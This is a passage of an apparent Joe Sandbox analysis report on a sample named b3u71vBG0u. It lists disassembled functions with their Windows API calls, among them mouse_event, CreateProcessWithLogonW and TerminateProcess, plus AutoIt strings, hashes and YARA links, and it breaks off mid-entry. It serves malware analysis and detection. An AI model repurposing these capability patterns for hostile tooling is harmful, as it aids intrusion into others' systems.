Instruction ID: 6cd250efac2e6801d9a871c9c36a35bb2f0ba250135c1fc755558817ecc1369e
Opcode Fuzzy Hash: 97668e55cde857a477091ecd7bd80bf0b75529678a3909af162a620a2064a2af
Instruction Fuzzy Hash: 6E413034600641EFDB25CF64C48AF997BE1BB05314F1882BDFA499F6A2C73AE845CB51

Function 007B73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,007B5134,?,?,00000000,00000001), ref: 007B73BF

Part of subcall function 007B3C94: GetWindowRect.USER32(?,?), ref: 007B3CA7

GetDesktopWindow.USER32 ref: 007B73E9
GetWindowRect.USER32(00000000), ref: 007B73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007B7422

Part of subcall function 007A54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A555E

GetCursorPos.USER32(?), ref: 007B744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007B74AC

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 9b5a6ee37486dfaa52f935e750f73c5e65d835f74c1b819d5c0c642c5425b99a
Instruction ID: e90308b04508060461cf15bd6784f81bf477bc56addb18a4f0039d1166592298
Opcode Fuzzy Hash: 9b5a6ee37486dfaa52f935e750f73c5e65d835f74c1b819d5c0c642c5425b99a
Instruction Fuzzy Hash: 1A31F432508345ABD724DF14D849F9BBBAAFFC8304F004929F58997191CA34EA08CB92

Function 00798D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007985F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00798608
Part of subcall function 007985F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00798612
Part of subcall function 007985F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00798621
Part of subcall function 007985F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00798628
Part of subcall function 007985F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079863E

GetLengthSid.ADVAPI32(?,00000000,00798977), ref: 00798DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00798DB8
HeapAlloc.KERNEL32(00000000), ref: 00798DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00798DD8
GetProcessHeap.KERNEL32(00000000,00000000,00798977), ref: 00798DEC
HeapFree.KERNEL32(00000000), ref: 00798DF3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 7d78e92ef06a1986e89726b1310d98ad2ecbf7c266d619fda7124704a3527862
Instruction ID: 508dfecba419bc5a1955d00cb68ec04a0b7943749169d11430820db7f579405c
Opcode Fuzzy Hash: 7d78e92ef06a1986e89726b1310d98ad2ecbf7c266d619fda7124704a3527862
Instruction Fuzzy Hash: C011E131600604FFDF549F64EC09FAE7B6AEF4A315F14802EE84597251CB3A9D40CB65

Function 00798AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00798B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00798B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00798B40
CloseHandle.KERNEL32(00000004), ref: 00798B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00798B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00798B8E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 355c798f58f62954bb6bd0bde963a3d4fe0eb0a4ac6b7e9313d7c2aa4d3d792a
Instruction ID: cc28a529230bacdd680ac1e5558e72dc8e4f383e61aefcc6f3ac3495f31cf008
Opcode Fuzzy Hash: 355c798f58f62954bb6bd0bde963a3d4fe0eb0a4ac6b7e9313d7c2aa4d3d792a
Instruction Fuzzy Hash: EC112CB2501249ABDF01CFA4ED49FDE7BAAFF49704F084069FE04A2160C77A9D649B61

Function 007CC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 007412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0074134D
Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074135C
Part of subcall function 007412F3: BeginPath.GDI32(?), ref: 00741373
Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007CC1C4
LineTo.GDI32(00000000,00000003,?), ref: 007CC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CC1E6
LineTo.GDI32(00000000,00000000,?), ref: 007CC1F6
EndPath.GDI32(00000000), ref: 007CC206
StrokePath.GDI32(00000000), ref: 007CC216

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 4efc129cc4bf99825e54f3c89debcc26fa4a63ab8f894e1caf9a92ca283a9bfa
Instruction ID: bc9f277f5b2fa0496b97221c5a633e913b4a864b100d156cb8ec4df21e9bd4ad
Opcode Fuzzy Hash: 4efc129cc4bf99825e54f3c89debcc26fa4a63ab8f894e1caf9a92ca283a9bfa
Instruction Fuzzy Hash: FA111B7640010CBFDF129F90DC88FAA7FADFB08354F048029FA189A161D7759DA5DBA0

Function 007603A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 007603D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 007603DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007603E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 007603F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 007603F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00760401

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 5529f75d7a6b3cd75b4a604ba21a46c43238f385dd926afb38c93e4185e5e001
Instruction ID: 7c72e4cc83a71e60546b4ddd755dce747b71ac33224df5f9c8ceeb27f9176874
Opcode Fuzzy Hash: 5529f75d7a6b3cd75b4a604ba21a46c43238f385dd926afb38c93e4185e5e001
Instruction Fuzzy Hash: 440148B0901759BDE3008F5A8C85A52FFA8FF19354F00411BE15847941C7B5A864CBE5

Function 007A568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007A569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007A56B1
GetWindowThreadProcessId.USER32(?,?), ref: 007A56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A56E0

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 16fea4d1bbfe8a5ab494583a21018baee700417d38f9f40824520c181d666208
Instruction ID: 47a249ca35835e095d4be32aa2359b52127ef4a131c0545b284ea7a85121d192
Opcode Fuzzy Hash: 16fea4d1bbfe8a5ab494583a21018baee700417d38f9f40824520c181d666208
Instruction Fuzzy Hash: 6AF03032241558BBE7215BA2DC0DEEF7F7DEFC6B11F04416DFA04E1050D7A91A0186B9

Function 007A74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 007A74E5
EnterCriticalSection.KERNEL32(?,?,00751044,?,?), ref: 007A74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00751044,?,?), ref: 007A7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00751044,?,?), ref: 007A7510

Part of subcall function 007A6ED7: CloseHandle.KERNEL32(00000000,?,007A751D,?,00751044,?,?), ref: 007A6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 007A7523
LeaveCriticalSection.KERNEL32(?,?,00751044,?,?), ref: 007A752A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 78e1abb270d4064ce1a86a5bcca936b07edb7167744caf2224b73753873c5d1e
Instruction ID: 3147cce728af5b7c4b370b43b2d3f4298667349ebdd8eb65a3eb7e24aa457189
Opcode Fuzzy Hash: 78e1abb270d4064ce1a86a5bcca936b07edb7167744caf2224b73753873c5d1e
Instruction Fuzzy Hash: 08F03A3A544612EBDB161B64EC8CDEE772AFF45302B04463AF202910A0CB795811CA54

Function 00798E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00798E7F
UnloadUserProfile.USERENV(?,?), ref: 00798E8B
CloseHandle.KERNEL32(?), ref: 00798E94
CloseHandle.KERNEL32(?), ref: 00798E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00798EA5
HeapFree.KERNEL32(00000000), ref: 00798EAC

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: b2ca2e09e2ca254eb1686e887b3966bcc6a03551158cc9da49719b017fac04b3
Instruction ID: 9fb6c19a1b5142b2a27ed841e2c9f7799956dafae32b7ede7bc083ba5f41278d
Opcode Fuzzy Hash: b2ca2e09e2ca254eb1686e887b3966bcc6a03551158cc9da49719b017fac04b3
Instruction Fuzzy Hash: 4EE0C236004805FBDA011FE2EC0CD0ABF6AFB89322B54823AF21981070CB3A9820DB58

Function 00797A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007D2C7C,?), ref: 00797C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007D2C7C,?), ref: 00797C4A
CLSIDFromProgID.OLE32(?,?,00000000,007CFB80,000000FF,?,00000000,00000800,00000000,?,007D2C7C,?), ref: 00797C6F
_memcmp.LIBCMT ref: 00797C90

Strings

,,}, xrefs: 00797A85

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,}
API String ID: 314563124-3650289849
Opcode ID: 6a04a984a4e08478d6bad451372fd00e402ecc5899a21f99576a0c2adebb8194
Instruction ID: fb1a40c762a44753fa4d40c33ae263ed656e63f1ff20877c2f070da21900759b
Opcode Fuzzy Hash: 6a04a984a4e08478d6bad451372fd00e402ecc5899a21f99576a0c2adebb8194
Instruction Fuzzy Hash: 98810A71A10109EFCF04DF94C988EEEB7B9FF89315F204198E506AB250DB75AE06CB60

Function 007B8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007B8928
CharUpperBuffW.USER32(?,?), ref: 007B8A37
VariantClear.OLEAUT32(?), ref: 007B8BAF

Part of subcall function 007A7804: VariantInit.OLEAUT32(00000000), ref: 007A7844
Part of subcall function 007A7804: VariantCopy.OLEAUT32(00000000,?), ref: 007A784D
Part of subcall function 007A7804: VariantClear.OLEAUT32(00000000), ref: 007A7859

Strings

AUTOIT.ERROR, xrefs: 007B8A3D
Incorrect Parameter format, xrefs: 007B8960, 007B8B22

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 6bd1fc222a717aad3bd8fd9ac1ebe95352cf60ca16640127c5652c03924df7fd
Instruction ID: 825d1761ffb048bb71b2fdf9af20bf101a3dac3155f5cdf6298e35a08e743ab5
Opcode Fuzzy Hash: 6bd1fc222a717aad3bd8fd9ac1ebe95352cf60ca16640127c5652c03924df7fd
Instruction Fuzzy Hash: D69182B1604301DFCB54DF24C484A9BBBE8EF89354F04896EF99A8B361DB35E905CB52

Function 007A2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9

_memset.LIBCMT ref: 007A3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A30A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007A3187

Strings

0, xrefs: 007A3063

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 850798b01621c7cfc42f5f2dee4246b3c7d6c3098db135d0fbd92ac41d6cd3eb
Instruction ID: d0560f59650dde8cd7de4b3f1a89daf1f11600862ba3f50c64bbf060c7f38519
Opcode Fuzzy Hash: 850798b01621c7cfc42f5f2dee4246b3c7d6c3098db135d0fbd92ac41d6cd3eb
Instruction Fuzzy Hash: 5D51CF316087049FD7659F28D849A6BBBE5EFC6320F044B2EF895D3191EB78CE448792

Function 007A2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007A2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 007A2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00806890,00000000), ref: 007A2D5A

Strings

0, xrefs: 007A2CA4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: dd51d65c91ff69548aa7319cf60c9f764e2faa49cd77f0d91a0222115e00a2e5
Instruction ID: 94250951c2c15c52c61f09d6edab89bcde827879571be886bff9536484898f88
Opcode Fuzzy Hash: dd51d65c91ff69548aa7319cf60c9f764e2faa49cd77f0d91a0222115e00a2e5
Instruction Fuzzy Hash: C7419F302043019FD724DF28D844B1ABBE9AFC6320F14465DF96697293DB78E906CBA2

Function 007BDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007BDAD9

Part of subcall function 007479AB: _memmove.LIBCMT ref: 007479F9

Strings

cdecl, xrefs: 007BDB30
winapi, xrefs: 007BDB4A
stdcall, xrefs: 007BDB5B
none, xrefs: 007BDBB4

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 68499a0e1ac7eb474199d3518e851f37740d6598b064717b718fa7a5aba998b3
Instruction ID: 3c9a8fa0523de0500422047339cf123182a4a5820525a791b5fd7f13d5d4192f
Opcode Fuzzy Hash: 68499a0e1ac7eb474199d3518e851f37740d6598b064717b718fa7a5aba998b3
Instruction Fuzzy Hash: 3E317EB1600619EBCF14EF64C885AEFB7B4FF05310B108629E966A7791DB39AD05CB80

Function 00799372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007993F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00799409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00799439

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

Strings

ComboBox, xrefs: 00799380
ListBox, xrefs: 007993B5

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: d6c42b67778abc6468b9c5dff11391124f5a4cb3b0b40cd4613fbf54f9ef83bf
Instruction ID: 66c18e6f009a9665a80e09213f793fe817dd09e8a74bdb3c97a02d0a62e51ac8
